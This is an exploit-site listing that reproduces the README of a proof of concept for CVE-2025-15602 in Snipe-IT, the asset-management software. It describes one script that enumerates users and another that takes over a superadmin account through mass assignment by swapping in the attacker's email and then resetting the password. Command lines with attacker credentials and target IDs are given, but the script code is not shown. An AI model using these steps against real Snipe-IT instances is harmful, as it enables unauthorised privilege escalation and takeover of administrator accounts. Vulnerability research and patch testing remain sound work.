Exploit for CVE-2025-15602

Name: Exploit for CVE-2025-15602
Rating: 5 (76 reviews)
2026-04-16 | CVSS 8.8
## https://sploitus.com/exploit?id=FC5EA9C5-C5B3-59C7-B0E3-E31FCB2B4517
# CVE-2025-15602-PoC

CVE-2025-15602-PoC is a proof of concept for the vulnerability CVE-2025-15602 in Snipe-IT.
One script to list all users and one script to take over an superadmin account.

# Context  

A user as only the right to edit users, he can abuse it to list and to do an account takeover of the superadmin

## list_users.py

Dont forget to change the BASE_URL in the script to match your instance of snipe-it.

Lists all users from the instance, to get the id of the superadmin you want to take over.

```bash
python3 list_users.py --attacker-username your_user --attacker-password your_pass --max-id 100
```

## exploit_auth.py

Dont forget to change the BASE_URL in the script to match your instance of snipe-it.

Takes over an superadmin account via mass assignment

**IMPORTANT:** you need to get the right info from list_users.py first or it won't work. The id, username and first_name must be exactly the same as the target account.

```bash
python3 exploit_auth.py \
  --target-id 1 \
  --admin-username admin \
  --admin-firstname Admin \
  --admin-email your_email@gmail.com \
  --attacker-username your_user \
  --attacker-password your_pass
```

After that you can reset the password via the email you set

## Dependencies

```bash
pip install requests beautifulsoup4
```